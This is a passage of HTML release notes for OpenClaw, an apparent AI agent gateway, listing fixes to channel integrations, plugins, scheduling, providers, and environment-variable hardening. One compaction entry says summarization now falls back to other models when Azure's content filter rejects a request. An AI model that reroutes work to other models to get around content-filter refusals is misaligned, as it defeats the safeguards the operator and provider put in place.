<li>Doctor/WhatsApp: warn when Linux crontabs still run the legacy <code>ensure-whatsapp.sh</code> health check, which can misreport <code>Gateway inactive</code> when cron lacks the systemd user-bus environment. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4199567980" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60204" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60204/hovercard" href="https://github.com/openclaw/openclaw/issues/60204">#60204</a>. Thanks @mySebbe.</li>
<li>Slack/setup: print the generated app manifest as plain JSON instead of embedding it inside the framed setup note, so it can be copied into Slack without deleting border characters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251790246" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65751" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65751/hovercard" href="https://github.com/openclaw/openclaw/issues/65751">#65751</a>. Thanks @theDanielJLewis.</li>
<li>Channels/WhatsApp: route CLI logout through the live Gateway and stop runtime-backed listeners before channel removal, so removing a WhatsApp account does not leave the old socket replying until restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4277177561" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67746" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67746/hovercard" href="https://github.com/openclaw/openclaw/issues/67746">#67746</a>. Thanks @123Mismail.</li>
<li>Voice Call/Twilio: honor TTS directive text and provider voice/model overrides during telephony synthesis, so <code>[[tts:...]]</code> tags are not spoken literally and voiceId overrides reach OpenAI/ElevenLabs calls. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175530255" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58114" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58114/hovercard" href="https://github.com/openclaw/openclaw/issues/58114">#58114</a>. Thanks @legonhilltech-jpg.</li>
<li>Agents/session-locks: reclaim untracked current-process session locks with matching starttime during acquisition and startup cleanup, so Gateway restarts recover from self-owned orphan <code>.jsonl.lock</code> files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366526190" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75805" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75805/hovercard" href="https://github.com/openclaw/openclaw/issues/75805">#75805</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4093489842" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49603" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49603/hovercard" href="https://github.com/openclaw/openclaw/issues/49603">#49603</a>. Thanks @cdznho.</li>
<li>Agents/subagents: initialize built-in context engines before native <code>sessions_spawn</code> resolves spawn preparation, so cliBackend-only cold starts no longer fail with an unregistered <code>legacy</code> context engine. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339592375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73095" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73095/hovercard" href="https://github.com/openclaw/openclaw/issues/73095">#73095</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347197163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73904" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73904/hovercard" href="https://github.com/openclaw/openclaw/pull/73904">#73904</a>) Thanks @brokemac79.</li>
<li>Plugins/Bonjour: ship the ciao runtime dependency with packaged OpenClaw so fresh OCM envs can start default mDNS discovery without a missing-module failure. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/tools: scope reply plugin-tool discovery to manifest-declared tool owners and already-active matching tool entries, avoiding broad plugin runtime loading for narrow or core-only tool allowlists. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/replies: defer implicit image model discovery and keep OAuth auth-store adoption on persisted profiles during reply startup, cutting OCM MarCodex warm prep to sub-second in live checks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/tools: enforce <code>contracts.tools</code> as the manifest ownership contract for plugin tool registration, rejecting undeclared runtime tool names and adding bundled plugin drift coverage. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/Codex: stop prompting message-tool-only source turns to finish with <code>NO_REPLY</code>, so quiet turns are represented by not calling the visible message tool instead of conflicting final-text instructions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Gateway/config: report failed backup restores as failed in logs and config observe audit records instead of marking them valid. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4314005687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70515" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70515/hovercard" href="https://github.com/openclaw/openclaw/pull/70515">#70515</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidangularme/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidangularme">@davidangularme</a>.</li>
<li>Compaction: use the active session model fallback chain for implicit summarization failures without persisting fallback model selection, so Azure content-filter 400s can recover. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245460651" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64960" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64960/hovercard" href="https://github.com/openclaw/openclaw/issues/64960">#64960</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352068136" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74470" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74470/hovercard" href="https://github.com/openclaw/openclaw/pull/74470">#74470</a>) Thanks @jalehman and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OpenCodeEngineer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OpenCodeEngineer">@OpenCodeEngineer</a>.</li>
<li>Gateway/config: allow <code>gateway config.patch</code> to update documented subagent thinking defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365780380" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75764" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75764/hovercard" href="https://github.com/openclaw/openclaw/issues/75764">#75764</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366498289" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75802" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75802/hovercard" href="https://github.com/openclaw/openclaw/pull/75802">#75802</a>) Thanks @kAIborg24.</li>
<li>Plugins/CLI: keep git plugin install paths credential-free, preserve existing git checkouts until replacement succeeds, honor duplicate npm install mode, and remove managed git repos on uninstall. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/CLI: redact authenticated git URLs from git install command failure details, so failed clone or checkout output cannot leak credentials during plugin installs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Channels/status reactions: remove stale non-terminal lifecycle reactions when a run reaches done or error, so Discord does not leave a permanent thinking emoji after completion. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363092374" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75458" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75458/hovercard" href="https://github.com/openclaw/openclaw/issues/75458">#75458</a>. Thanks @davelutztx.</li>
<li>Discord/doctor: migrate unsupported per-channel <code>agentId</code> entries under guild channel config into top-level <code>bindings[]</code> routes, so <code>openclaw doctor --fix</code> preserves the intended agent route instead of stripping it as an unknown key. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4217423565" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62455" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62455/hovercard" href="https://github.com/openclaw/openclaw/issues/62455">#62455</a>. Thanks @lobster-biscuit.</li>
<li>Discord/DMs: set inbound direct-message <code>ctx.To</code> to the semantic <code>user:&lt;id&gt;</code> target while keeping delivery routed through the DM channel, so mirror and recovery paths do not treat DMs as channel conversations. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4282995155" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68126" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68126/hovercard" href="https://github.com/openclaw/openclaw/issues/68126">#68126</a>. Thanks @illuminate0623.</li>
<li>Discord/DMs: keep no-guild inbound messages on direct-message routing when Discord channel lookup is temporarily unavailable, preventing degraded DMs from forking into channel sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4195831671" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59817" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59817/hovercard" href="https://github.com/openclaw/openclaw/issues/59817">#59817</a>. Thanks @DooPeePey.</li>
<li>Discord: retry outbound API calls on HTTP 5xx, request-timeout, and transient transport failures instead of only Discord rate limits, reducing dropped cron and agent replies during short Discord or network outages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116577020" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52396" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52396/hovercard" href="https://github.com/openclaw/openclaw/issues/52396">#52396</a>. Thanks @sunshineo.</li>
<li>Discord: include Components v2 Text Display content from referenced replies and forwarded snapshots, so component-only messages still appear in reply context. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4158079453" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56228" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56228/hovercard" href="https://github.com/openclaw/openclaw/issues/56228">#56228</a>. Thanks @HollandDrive.</li>
<li>Discord: add configurable gateway READY timeouts for startup and runtime reconnects, so staggered multi-account setups can avoid false restart loops. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331372526" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72273" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72273/hovercard" href="https://github.com/openclaw/openclaw/issues/72273">#72273</a>. Thanks @sergionsantos.</li>
<li>Discord: preserve native slash-command description localizations through command reconcile, so localized Discord descriptions no longer get overwritten by English defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4161405333" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56580" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56580/hovercard" href="https://github.com/openclaw/openclaw/issues/56580">#56580</a>. Thanks @mhseo93.</li>
<li>Discord: add configured outbound mention aliases so known <code>@Name</code> references can be rewritten to real Discord user mentions instead of relying only on the transient directory cache. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274166014" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67587" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67587/hovercard" href="https://github.com/openclaw/openclaw/issues/67587">#67587</a>. Thanks @McoreD.</li>
<li>Discord: avoid startup REST amplification by skipping native command deploy retries after Discord rate limits and deriving the bot id from parseable bot tokens instead of requiring a <code>/users/@me</code> lookup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362306201" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75341" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75341/hovercard" href="https://github.com/openclaw/openclaw/issues/75341">#75341</a>. Thanks @PrinceOfEgypt.</li>
<li>Plugins/hooks: derive hook <code>ctx.channelId</code> from the conversation target instead of the provider name, so Discord and other channel plugins can keep per-channel state isolated. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4196584916" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59881" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59881/hovercard" href="https://github.com/openclaw/openclaw/issues/59881">#59881</a>. Thanks @bradfreels.</li>
<li>Gateway/config: log config health-state write failures instead of silently hiding config observe-recovery write errors. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sallyom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sallyom">@sallyom</a>.</li>
<li>Diagnostics: reset stuck-session timers on reply, tool, status, block, and ACP progress events, and back off repeated <code>session.stuck</code> diagnostics while a session remains unchanged. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330206713" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72010" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72010/hovercard" href="https://github.com/openclaw/openclaw/pull/72010">#72010</a>. Thanks @rubencu.</li>
<li>Gateway/agents: avoid rebuilding core tools for plugin-only allowlists and keep the full plugin registry cache warm across scoped plugin loads, reducing per-turn latency spikes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367404227" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75882" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75882/hovercard" href="https://github.com/openclaw/openclaw/issues/75882">#75882</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367580317" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75907" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75907/hovercard" href="https://github.com/openclaw/openclaw/issues/75907">#75907</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367573379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75906" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75906/hovercard" href="https://github.com/openclaw/openclaw/issues/75906">#75906</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367498934" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75887" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75887/hovercard" href="https://github.com/openclaw/openclaw/issues/75887">#75887</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367081946" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75851" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75851/hovercard" href="https://github.com/openclaw/openclaw/issues/75851">#75851</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367733132" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75922" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75922/hovercard" href="https://github.com/openclaw/openclaw/pull/75922">#75922</a>) Thanks @obviyus.</li>
<li>Agents/failover: classify bare <code>status: internal server error</code> provider messages as retryable server errors so model fallback can rotate instead of stopping. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346697764" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73844" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73844/hovercard" href="https://github.com/openclaw/openclaw/pull/73844">#73844</a>) Thanks @thesomewhatyou.</li>
<li>Gateway/startup: return the shared retryable startup-sidecars error for startup-gated control-plane RPCs such as sessions.create, sessions.send, sessions.abort, agent.wait, and tools.effective, so clients can retry early sidecar races. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368487370" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76012" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76012/hovercard" href="https://github.com/openclaw/openclaw/pull/76012">#76012</a>) Thanks @scoootscooob.</li>
<li>Providers/Google: fix Gemini 2.5 Flash-Lite <code>reasoning: "minimal"</code> rejections by raising its thinking-budget floor to 512 while preserving the existing Gemini 2.5 Pro and Flash minimal presets. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316577583" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70629" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70629/hovercard" href="https://github.com/openclaw/openclaw/pull/70629">#70629</a>) Thanks @ericberic.</li>
<li>Agents/status: resolve <code>session_status(sessionKey="current")</code> for sparse channel-plugin sessions after literal current lookups miss, so Scope, Slack, Discord, and other plugin-driven agents avoid retrying through <code>Unknown sessionKey: current</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348384116" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74141" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74141/hovercard" href="https://github.com/openclaw/openclaw/issues/74141">#74141</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331560781" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72306" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72306/hovercard" href="https://github.com/openclaw/openclaw/pull/72306">#72306</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>.</li>
<li>Cron: retry recurring wake-now main-session jobs through temporary heartbeat busy skips before recording success, so queued cron events no longer appear as ok ghost runs while the main lane is still busy. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368042745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75964" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75964/hovercard" href="https://github.com/openclaw/openclaw/issues/75964">#75964</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369011338" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76083" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76083/hovercard" href="https://github.com/openclaw/openclaw/pull/76083">#76083</a>) Thanks @kshetrajna12 and @xuruiray.</li>
<li>Providers/Google: keep Gemini thinking-signature-only stream chunks active during reasoning, so Gemini 3.1 Pro Preview replies no longer hit idle timeouts before visible text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368880968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76071" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76071/hovercard" href="https://github.com/openclaw/openclaw/issues/76071">#76071</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368997122" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76080" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76080/hovercard" href="https://github.com/openclaw/openclaw/pull/76080">#76080</a>) Thanks @marcoschierhorn and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</li>
<li>CLI/skills: show per-agent model and command visibility in <code>openclaw skills check --agent</code>, and let doctor report or disable unavailable skills allowed for the default agent. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368251753" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75983" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75983/hovercard" href="https://github.com/openclaw/openclaw/pull/75983">#75983</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</li>
<li>Agents/runtime/tools: keep reply startup on Gateway metadata, manifest catalog rows, auth-store state, and plugin loader cache-key compatibility checks so scoped runtime registries, model allowlists, thinking metadata, media/PDF/generation tools, Comfy workflows, OpenAI Codex OAuth image generation, and image/video/music tool registration avoid broad provider/runtime loads while preserving explicit config and auth-backed providers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Discord: document canonical mention formatting in agent prompt hints and channel docs so outbound replies use <code>&lt;@USER_ID&gt;</code>, <code>&lt;#CHANNEL_ID&gt;</code>, and <code>&lt;@&amp;ROLE_ID&gt;</code> instead of legacy nickname mentions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359907332" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75173" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75173/hovercard" href="https://github.com/openclaw/openclaw/pull/75173">#75173</a>)</li>
<li>Heartbeat scheduler: gate exec-event/notification/spawn/retry wakes through a centralized cooldown so backgrounded <code>process.start</code> exit notifications can no longer self-feed runaway heartbeat runs (configured <code>every: "30m"</code> was firing every ~10s in production, pegging the gateway event loop with <code>eventLoopDelayMaxMs &gt;6s</code> spikes that stalled control-UI asset serving and TUI handshakes). Documented wake-now paths (<code>manual</code>, <code>wake</code>, task completion, blocked-task follow-up, <code>/hooks/wake mode=now</code>, and cron <code>--wake now</code>) remain immediate; retryable busy skips no longer poison the cooldown for the next retry; per-agent flood guard caps any unexpected feedback loop at 5 runs/60s. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4236016269" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64016" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64016/hovercard" href="https://github.com/openclaw/openclaw/issues/64016">#64016</a>, refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3946045245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/17797" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/17797/hovercard" href="https://github.com/openclaw/openclaw/issues/17797">#17797</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362911805" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75436" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75436/hovercard" href="https://github.com/openclaw/openclaw/issues/75436">#75436</a>) Thanks @hexsprite.</li>
<li>fix: block workspace CLOUDSDK_PYTHON override and always set trusted interpreter for gcloud. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352375218" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74492" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74492/hovercard" href="https://github.com/openclaw/openclaw/pull/74492">#74492</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Providers/Z.AI: move the bundled GLM catalog and auth env metadata into the plugin manifest, so <code>models list --all --provider zai</code> shows the full known catalog without duplicated runtime seed data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Providers/Qianfan and Providers/Stepfun: declare setup auth metadata (<code>api-key</code> method, <code>QIANFAN_API_KEY</code>, <code>STEPFUN_API_KEY</code>) in the plugin manifest so onboarding and <code>models setup</code> surface the expected env var without falling back to legacy <code>providerAuthEnvVars</code> runtime seed data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>fix(infra): block ambient Homebrew env vars from brew resolution. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351948564" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74463" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74463/hovercard" href="https://github.com/openclaw/openclaw/pull/74463">#74463</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Onboarding/configure: avoid staging every default plugin runtime dependency after config writes, so skipped setup flows only prepare config-selected plugin deps instead of pulling broad feature-plugin packages. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Thinking/providers: resolve bundled provider thinking profiles through lightweight provider policy artifacts when startup-lazy providers are not active, so OpenAI Codex GPT-5.x keeps xhigh available in Gateway session validation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355122984" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74796" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74796/hovercard" href="https://github.com/openclaw/openclaw/issues/74796">#74796</a>. Thanks @maxschachere.</li>
<li>Security/Windows: ignore workspace <code>.env</code> system-path variables and resolve stale-process <code>taskkill.exe</code> from the validated Windows install root, preventing repository-local env files from redirecting cleanup helpers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>CLI/plugins: refresh persisted plugin registry policy in place for <code>plugins enable</code> and <code>plugins disable</code>, so routine toggles no longer rebuild and hash every plugin source when the target is already indexed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Windows/install: run npm from a writable installer temp directory and pin the Bedrock runtime dependency below a Windows ARM Node 24 npm resolver failure, so global OpenClaw installs no longer fail before onboarding. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</li>
<li>CLI/plugins: scope install and enable slot selection to the selected plugin manifest/runtime fallback, so plugin installs no longer load every plugin runtime or broad status snapshot just to update memory/context slots. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/TTS: keep bundled speech-provider discovery available on cold package Gateway paths and add bundled plugin matrix runtime probes for health, readiness, RPC, TTS discovery, and post-ready runtime-deps watchdog coverage. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Google Meet/Twilio: show delegated voice call ID, DTMF, and intro-greeting state in <code>googlemeet doctor</code>, and avoid claiming DTMF was sent when no Meet PIN sequence was configured. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</li>
